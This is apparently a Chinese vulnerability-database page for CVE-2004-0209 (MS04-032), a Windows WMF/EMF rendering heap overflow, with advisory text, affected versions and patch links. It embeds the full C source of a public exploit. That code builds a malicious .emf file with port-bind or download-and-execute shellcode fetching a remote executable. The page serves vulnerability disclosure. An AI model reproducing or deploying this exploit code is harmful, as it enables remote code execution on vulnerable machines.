CVE-2004-0209
CVSS10.0
发布时间 :2004-11-03 00:00:00
修订时间 :2016-10-17 22:41:53
NMCOEPS    

[原文]Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer."


[CNNVD]Microsoft Windows图形渲染引擎安全漏洞(MS04-032)(CNNVD-200411-005)

        
        Microsoft Windows是一款微软开发的操作系统。
        Microsoft Windows对Windows Metafiel和增强Metafile图象格式处理存在问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        攻击者构建恶意WMF或EMF格式图象文件,诱使用户处理,就可能以渲染处理WMF或者EMF图象的应用程序进程权限执行任意指令。目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000Microsoft Windows 2000
cpe:/o:microsoft:windows_2003_server:r2
cpe:/o:microsoft:windows_xp::goldMicrosoft windows xp_gold

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:2428Windows XP/Server 2003 (64-Bit) Enhanced Metafile Image Format Rendering Buffer Overflow
oval:org.mitre.oval:def:2114Windows 2000 Enhanced Metafile Image Format Rendering Buffer Overflow
oval:org.mitre.oval:def:1872Windows XP Enhanced Metafile Image Format Rendering Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0209
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0209
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-005
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109829067325779&w=2
(UNKNOWN)  BUGTRAQ  20041019 [EXPL] (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow
http://www.kb.cert.org/vuls/id/806278
(UNKNOWN)  CERT-VN  VU#806278
http://www.microsoft.com/technet/security/bulletin/ms04-032.asp
(VENDOR_ADVISORY)  MS  MS04-032
http://www.securityfocus.com/bid/11375
(UNKNOWN)  BID  11375
http://xforce.iss.net/xforce/xfdb/16581
(VENDOR_ADVISORY)  XF  win-emf-bo(16581)
http://xforce.iss.net/xforce/xfdb/17658
(UNKNOWN)  XF  win-ms04032-patch(17658)

- 漏洞信息

Microsoft Windows图形渲染引擎安全漏洞(MS04-032)
危急 边界条件错误
2004-11-03 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft Windows是一款微软开发的操作系统。
        Microsoft Windows对Windows Metafiel和增强Metafile图象格式处理存在问题,远程攻击者可以利用这个漏洞以进程权限在系统上执行任意指令。
        攻击者构建恶意WMF或EMF格式图象文件,诱使用户处理,就可能以渲染处理WMF或者EMF图象的应用程序进程权限执行任意指令。目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS04-032)以及相应补丁:
        MS04-032:Security Update for Microsoft Windows (840987)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS04-032.mspx

        补丁下载:
        Microsoft Windows NT Server 4.0 Service Pack 6a
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=533AE5CD-74CE-470A-8916-8E358084497C

        Microsoft Windows NT Server 4.0 Terminal Server Edition Service Pack 6
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=3B871A96-5F64-4432-920F-FA5760DF683A

        Microsoft Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=4A614222-BA0B-4927-856D-D443BBBE1A42

        
        Microsoft Windows XP and Microsoft Windows XP Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=715E985B-7929-4BD5-9564-5CFE7D528398

        
        Microsoft Windows XP 64-Bit Edition Service Pack 1
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=99184841-70A8-47C7-9993-44A60E999A40

        
        Microsoft Windows XP 64-Bit Edition Version 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=B4E6BBCF-F5B9-4B2D-8BC4-30911CA4FD9C

        
        Microsoft Windows Server? 2003
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=206E9842-997D-45E4-9252-61F3CE5EA66C

        
        Microsoft Windows Server 2003 64-Bit Edition
        
        http://www.microsoft.com/downloads/details.aspx?FamilyId=B4E6BBCF-F5B9-4B2D-8BC4-30911CA4FD9C

- 漏洞信息 (584)

MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) (EDBID:584)
windows remote
2004-10-20 Verified
0 houseofdabus
N/A [点击下载]
/* HOD-ms04032-emf-expl2.c: 
 * 
 * (MS04-032) Microsoft Windows XP Metafile (.emf) Heap Overflow 
 * 
 * Exploit version 0.2 (PUBLIC) coded by 
 * 
 * 
 *                 .::[ houseofdabus ]::. 
 * 
 * 
 * [at inbox dot ru] 
 * ------------------------------------------------------------------- 
 * About WMF/EMF: 
 * Windows Metafile (WMF) and Enhanced Windows Metafile (EMF) formats 
 * are vector files that can contain a raster image... 
 * 
 * ------------------------------------------------------------------- 
 * The vulnerability will be triggered by either viewing a malicious 
 * file or by navigating to a directory, which contains a malicious 
 * file and displays it as a thumbnail. 
 * 
 * Graphics Rendering Engine Vulnerability - CAN-2004-0209 
 * ------------------------------------------------------------------- 
 * Tested on: 
 *    - Internet Explorer 6.0 (SP1) (iexplore.exe) 
 *    - Explorer (explorer.exe) 
 *    - Windows XP SP1 
 * 
 * ------------------------------------------------------------------- 
 * Compile: 
 *    Win32/VC++  : cl HOD-ms04032-emf-expl.c 
 *    Win32/cygwin: gcc HOD-ms04032-emf-expl.c -lws2_32.lib 
 *    Linux       : gcc -o HOD-ms04032-emf-expl HOD-ms04032-emf-expl.c 
 * 
 * ------------------------------------------------------------------- 
 * Command Line Parameters/Arguments: 
 * 
 *   HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP] 
 * 
 *   Shellcode: 
 *        1 - Portbind shellcode 
 *        2 - Connectback shellcode 
 * 
 * ------------------------------------------------------------------- 
 * Examples: 
 * 
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 1 7777 
 * 
 * C:\>HOD-ms04032-emf-expl.exe expl.emf 2 http://host/file.exe 
 * 
 * ------------------------------------------------------------------- 
 * 
 *   This is provided as proof-of-concept code only for educational 
 *   purposes and testing by authorized individuals with permission to 
 *   do so. 
 * 
 */ 
 
 
/* #define _WIN32 */ 
 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
 
#ifdef _WIN32 
#pragma comment(lib,"ws2_32") 
#include <winsock2.h> 
 
#else 
#include <sys/types.h> 
#include <netinet/in.h> 
#include <sys/socket.h> 
#endif 
 
#include <windows.h> 
 
 
unsigned char emfheader[] =  
"\x01\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x20\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 
"\x4c\x03\x00\x00\x4c\x03\x00\x00\x20\x45\x4d\x46\x00\x00\x01\x00" 
"\x40\x00\x00\x00\x0b\x00\x00\x00\x0a\x00\x00\x00\xff\xff\x00\x00" 
 
"\xEB\x12\x90\x90\x90\x90\x90\x90" 
"\x9e\x5c\x05\x78"	/* call [edi+0x74h] - rpcrt4.dll */ 
"\xb4\x73\xed\x77";	/* Top SEH          - XP SP1 */ 
 
 
unsigned char portbind_sc[] = 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
 
"\xeb\x03\x5d\xeb\x05\xe8\xf8\xff" 
"\xff\xff\x8b\xc5\x83\xc0\x11\x33\xc9\x66\xb9\xc9\x01\x80\x30\x88" 
"\x40\xe2\xfa\xdd\x03\x64\x03\x7c\x09\x64\x08\x88\x88\x88\x60\xc4" 
"\x89\x88\x88\x01\xce\x74\x77\xfe\x74\xe0\x06\xc6\x86\x64\x60\xd9" 
"\x89\x88\x88\x01\xce\x4e\xe0\xbb\xba\x88\x88\xe0\xff\xfb\xba\xd7" 
"\xdc\x77\xde\x4e\x01\xce\x70\x77\xfe\x74\xe0\x25\x51\x8d\x46\x60" 
"\xb8\x89\x88\x88\x01\xce\x5a\x77\xfe\x74\xe0\xfa\x76\x3b\x9e\x60" 
"\xa8\x89\x88\x88\x01\xce\x46\x77\xfe\x74\xe0\x67\x46\x68\xe8\x60" 
"\x98\x89\x88\x88\x01\xce\x42\x77\xfe\x70\xe0\x43\x65\x74\xb3\x60" 
"\x88\x89\x88\x88\x01\xce\x7c\x77\xfe\x70\xe0\x51\x81\x7d\x25\x60" 
"\x78\x88\x88\x88\x01\xce\x78\x77\xfe\x70\xe0\x2c\x92\xf8\x4f\x60" 
"\x68\x88\x88\x88\x01\xce\x64\x77\xfe\x70\xe0\x2c\x25\xa6\x61\x60" 
"\x58\x88\x88\x88\x01\xce\x60\x77\xfe\x70\xe0\x6d\xc1\x0e\xc1\x60" 
"\x48\x88\x88\x88\x01\xce\x6a\x77\xfe\x70\xe0\x6f\xf1\x4e\xf1\x60" 
"\x38\x88\x88\x88\x01\xce\x5e\xbb\x77\x09\x64\x7c\x89\x88\x88\xdc" 
"\xe0\x89\x89\x88\x88\x77\xde\x7c\xd8\xd8\xd8\xd8\xc8\xd8\xc8\xd8" 
"\x77\xde\x78\x03\x50\xdf\xdf\xe0\x8a\x88\xAB\x6F\x03\x44\xe2\x9e" 
"\xd9\xdb\x77\xde\x64\xdf\xdb\x77\xde\x60\xbb\x77\xdf\xd9\xdb\x77" 
"\xde\x6a\x03\x58\x01\xce\x36\xe0\xeb\xe5\xec\x88\x01\xee\x4a\x0b" 
"\x4c\x24\x05\xb4\xac\xbb\x48\xbb\x41\x08\x49\x9d\x23\x6a\x75\x4e" 
"\xcc\xac\x98\xcc\x76\xcc\xac\xb5\x01\xdc\xac\xc0\x01\xdc\xac\xc4" 
"\x01\xdc\xac\xd8\x05\xcc\xac\x98\xdc\xd8\xd9\xd9\xd9\xc9\xd9\xc1" 
"\xd9\xd9\x77\xfe\x4a\xd9\x77\xde\x46\x03\x44\xe2\x77\x77\xb9\x77" 
"\xde\x5a\x03\x40\x77\xfe\x36\x77\xde\x5e\x63\x16\x77\xde\x9c\xde" 
"\xec\x29\xb8\x88\x88\x88\x03\xc8\x84\x03\xf8\x94\x25\x03\xc8\x80" 
"\xd6\x4a\x8c\x88\xdb\xdd\xde\xdf\x03\xe4\xac\x90\x03\xcd\xb4\x03" 
"\xdc\x8d\xf0\x8b\x5d\x03\xc2\x90\x03\xd2\xa8\x8b\x55\x6b\xba\xc1" 
"\x03\xbc\x03\x8b\x7d\xbb\x77\x74\xbb\x48\x24\xb2\x4c\xfc\x8f\x49" 
"\x47\x85\x8b\x70\x63\x7a\xb3\xf4\xac\x9c\xfd\x69\x03\xd2\xac\x8b" 
"\x55\xee\x03\x84\xc3\x03\xd2\x94\x8b\x55\x03\x8c\x03\x8b\x4d\x63" 
"\x8a\xbb\x48\x03\x5d\xd7\xd6\xd5\xd3\x4a\x8c\x88"; 
 
 
unsigned char download_sc[]= 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
 
"\xEB\x0F\x58\x80\x30\x17\x40\x81\x38\x6D\x30\x30\x21\x75\xF4" 
"\xEB\x05\xE8\xEC\xFF\xFF\xFF\xFE\x94\x16\x17\x17\x4A\x42\x26" 
"\xCC\x73\x9C\x14\x57\x84\x9C\x54\xE8\x57\x62\xEE\x9C\x44\x14" 
"\x71\x26\xC5\x71\xAF\x17\x07\x71\x96\x2D\x5A\x4D\x63\x10\x3E" 
"\xD5\xFE\xE5\xE8\xE8\xE8\x9E\xC4\x9C\x6D\x2B\x16\xC0\x14\x48" 
"\x6F\x9C\x5C\x0F\x9C\x64\x37\x9C\x6C\x33\x16\xC1\x16\xC0\xEB" 
"\xBA\x16\xC7\x81\x90\xEA\x46\x26\xDE\x97\xD6\x18\xE4\xB1\x65" 
"\x1D\x81\x4E\x90\xEA\x63\x05\x50\x50\xF5\xF1\xA9\x18\x17\x17" 
"\x17\x3E\xD9\x3E\xE0\xFE\xFF\xE8\xE8\xE8\x26\xD7\x71\x9C\x10" 
"\xD6\xF7\x15\x9C\x64\x0B\x16\xC1\x16\xD1\xBA\x16\xC7\x9E\xD1" 
"\x9E\xC0\x4A\x9A\x92\xB7\x17\x17\x17\x57\x97\x2F\x16\x62\xED" 
"\xD1\x17\x17\x9A\x92\x0B\x17\x17\x17\x47\x40\xE8\xC1\x7F\x13" 
"\x17\x17\x17\x7F\x17\x07\x17\x17\x7F\x68\x81\x8F\x17\x7F\x17" 
"\x17\x17\x17\xE8\xC7\x9E\x92\x9A\x17\x17\x17\x9A\x92\x18\x17" 
"\x17\x17\x47\x40\xE8\xC1\x40\x9A\x9A\x42\x17\x17\x17\x46\xE8" 
"\xC7\x9E\xD0\x9A\x92\x4A\x17\x17\x17\x47\x40\xE8\xC1\x26\xDE" 
"\x46\x46\x46\x46\x46\xE8\xC7\x9E\xD4\x9A\x92\x7C\x17\x17\x17" 
"\x47\x40\xE8\xC1\x26\xDE\x46\x46\x46\x46\x9A\x82\xB6\x17\x17" 
"\x17\x45\x44\xE8\xC7\x9E\xD4\x9A\x92\x6B\x17\x17\x17\x47\x40" 
"\xE8\xC1\x9A\x9A\x86\x17\x17\x17\x46\x7F\x68\x81\x8F\x17\xE8" 
"\xA2\x9A\x17\x17\x17\x44\xE8\xC7\x48\x9A\x92\x3E\x17\x17\x17" 
"\x47\x40\xE8\xC1\x7F\x17\x17\x17\x17\x9A\x8A\x82\x17\x17\x17" 
"\x44\xE8\xC7\x9E\xD4\x9A\x92\x26\x17\x17\x17\x47\x40\xE8\xC1" 
"\xE8\xA2\x86\x17\x17\x17\xE8\xA2\x9A\x17\x17\x17\x44\xE8\xC7" 
"\x9A\x92\x2E\x17\x17\x17\x47\x40\xE8\xC1\x44\xE8\xC7\x9A\x92" 
"\x56\x17\x17\x17\x47\x40\xE8\xC1\x7F\x12\x17\x17\x17\x9A\x9A" 
"\x82\x17\x17\x17\x46\xE8\xC7\x9A\x92\x5E\x17\x17\x17\x47\x40" 
"\xE8\xC1\x7F\x17\x17\x17\x17\xE8\xC7\xFF\x6F\xE9\xE8\xE8\x50" 
"\x72\x63\x47\x65\x78\x74\x56\x73\x73\x65\x72\x64\x64\x17\x5B" 
"\x78\x76\x73\x5B\x7E\x75\x65\x76\x65\x6E\x56\x17\x41\x7E\x65" 
"\x63\x62\x76\x7B\x56\x7B\x7B\x78\x74\x17\x48\x7B\x74\x65\x72" 
"\x76\x63\x17\x48\x7B\x60\x65\x7E\x63\x72\x17\x48\x7B\x74\x7B" 
"\x78\x64\x72\x17\x40\x7E\x79\x52\x6F\x72\x74\x17\x52\x6F\x7E" 
"\x63\x47\x65\x78\x74\x72\x64\x64\x17\x40\x7E\x79\x5E\x79\x72" 
"\x63\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x56" 
"\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x58\x67\x72\x79\x42\x65" 
"\x7B\x56\x17\x5E\x79\x63\x72\x65\x79\x72\x63\x45\x72\x76\x73" 
"\x51\x7E\x7B\x72\x17\x17\x17\x17\x17\x17\x17\x17\x17\x7A\x27" 
"\x27\x39\x72\x6F\x72\x17""HOD""\x21"; 
 
unsigned char endoffile[] = "\x00\x00\x00\x00"; 
 
 
void 
usage(char *prog) 
{ 
	printf("Usage:\n"); 
	printf("%s <file> <shellcode> <bindport / url>\n", prog); 
	printf("\nShellcode:\n"); 
	printf("      1 - Portbind shellcode\n"); 
	printf("      2 - Download & exec shellcode\n\n"); 
	exit(0); 
} 
 
 
int 
main(int argc, char **argv) 
{ 
	char endofurl = '\x01'; 
	unsigned short port; 
	int sc; 
	FILE *fp; 
 
	printf("\n(MS04-032) Microsoft Windows XP Metafile 
(.emf) Heap Overflow\n\n"); 
	printf("--- Coded by .::[ houseofdabus ]::. ---\n\n"); 
 
	if (argc < 4) usage(argv[0]); 
 
	sc = atoi(argv[2]); 
	if ((sc > 2) || (sc < 1)) usage(argv[0]); 
 
	fp = fopen(argv[1], "wb"); 
	if (fp == NULL) { 
		printf("[-] error: can\'t create file: %s\n", argv[1]); 
		exit(0); 
	} 
 
	/* header */ 
	fwrite(emfheader, 1, sizeof(emfheader)-1, fp); 
 
	printf("[*] Shellcode: "); 
	if (sc == 1) { 
		port = atoi(argv[3]); 
		printf("Portbind, port = %u\n", port); 
		port = htons(port^(unsigned short)0x8888); 
		memcpy(portbind_sc+266, &port, 2); 
		fwrite(portbind_sc, 1, sizeof(portbind_sc)-1, fp); 
		fwrite(endoffile, 1, 4, fp); 
	} 
	else { 
		printf("Download & exec, url = %s\n", argv[3]); 
		fwrite(download_sc, 1, sizeof(download_sc)-1, 
fp); 
		fwrite(argv[3], 1, strlen(argv[3]), fp); 
		fwrite(&endofurl, 1, 1, fp); 
		fwrite(endoffile, 1, 4, fp); 
	} 
 
	printf("[+] Ok\n"); 
	fclose(fp); 
 
return 0; 
} 

// milw0rm.com [2004-10-20]
		

- 漏洞信息 (F34676)

HOD-ms04032-emf-expl2.c (PacketStormID:F34676)
2004-10-19 00:00:00
houseofdabus  
exploit
CVE-2004-0209
[点击下载]

Exploit that creates crafted metadata files to exploit IE6.0 display of such, as well as Explorer.exe's display of thumbnails of such. Created by houseofdabus. Exploit will connect back to set host/port.

- 漏洞信息

10692
Microsoft Windows Metafile Image Format Arbitrary Code Execution
Local Access Required Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial

- 漏洞描述

A local overflow exists in Windows. The Graphics Rendering Engine fails to validate Windows Metafile (WMF) and Enhanced Metafile (EMF) image files resulting in a buffer overflow. With a specially crafted request, an attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2004-10-12 Unknow
2004-10-19 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

- 漏洞信息

Microsoft Windows WMF/EMF Image Format Rendering Remote Buffer Overflow Vulnerability
Boundary Condition Error 11375
Yes No
2004-10-12 12:00:00 2008-12-10 11:51:00
Discovery of this issue is credited to Patrick Porlan <porlan@club-internet.fr> and Mark Russinovich of Winternals Software.

- 受影响的程序版本

Microsoft Windows XP Professional SP1
Microsoft Windows XP Professional
Microsoft Windows XP Media Center Edition SP1
Microsoft Windows XP Media Center Edition
Microsoft Windows XP Home SP1
Microsoft Windows XP Home
Microsoft Windows XP 64-bit Edition Version 2003 SP1
Microsoft Windows XP 64-bit Edition Version 2003
Microsoft Windows XP 64-bit Edition SP1
Microsoft Windows XP 64-bit Edition
Microsoft Windows Server 2003 Standard x64 Edition
Microsoft Windows Server 2003 Enterprise x64 Edition
Microsoft Windows Server 2003 Datacenter x64 Edition
Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Server SP3
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Professional SP3
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Datacenter Server SP3
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows 2000 Advanced Server SP3
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Avaya S8100 Media Servers R9
Avaya S8100 Media Servers R8
Avaya S8100 Media Servers R7
Avaya S8100 Media Servers R6
Avaya S8100 Media Servers R12
Avaya S8100 Media Servers R11
Avaya S8100 Media Servers R10
Avaya S8100 Media Servers 0
+ Microsoft Windows 2000 Server
+ Microsoft Windows NT Server 4.0 SP6a
Avaya S3400 Message Application Server 0
+ Microsoft Windows 2000 Server
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya IP600 Media Servers R9
Avaya IP600 Media Servers R8
Avaya IP600 Media Servers R7
Avaya IP600 Media Servers R6
Avaya IP600 Media Servers R12
Avaya IP600 Media Servers R11
Avaya IP600 Media Servers R10
Avaya IP600 Media Servers
Avaya DefinityOne Media Servers R9
Avaya DefinityOne Media Servers R8
Avaya DefinityOne Media Servers R7
Avaya DefinityOne Media Servers R6
Avaya DefinityOne Media Servers R12
Avaya DefinityOne Media Servers R11
Avaya DefinityOne Media Servers R10
Avaya DefinityOne Media Servers
Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2

- 不受影响的程序版本

Microsoft Windows XP Professional SP2
Microsoft Windows XP Home SP2

- 漏洞讨论

Microsoft Windows WMF/EMF image-rendering library is affected by a remote buffer-overflow vulnerability because it fails to properly verify the lengths of strings contained within an affected image file before copying them into finite buffers.

Any code execution that occurs will take place with SYSTEM privileges because of the nature of the affected library. This will also permit local privilege-escalation attacks.

- 漏洞利用

The following exploit has been made available:

- 解决方案

Microsoft has released a bulletin that includes fixes to address this issue for supported versions of the operating system.


Microsoft Windows XP 64-bit Edition SP1

Microsoft Windows 2000 Advanced Server SP4

Microsoft Windows 2000 Professional SP3

Microsoft Windows 2000 Datacenter Server SP4

Microsoft Windows XP Home

Microsoft Windows 2000 Advanced Server SP3

Microsoft Windows XP Home SP1

Microsoft Windows 2000 Datacenter Server SP3

Microsoft Windows 2000 Server SP3

Microsoft Windows XP 64-bit Edition Version 2003

Microsoft Windows 2000 Server SP4

Microsoft Windows XP Professional

Microsoft Windows 2000 Professional SP4

Microsoft Windows XP Professional SP1

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站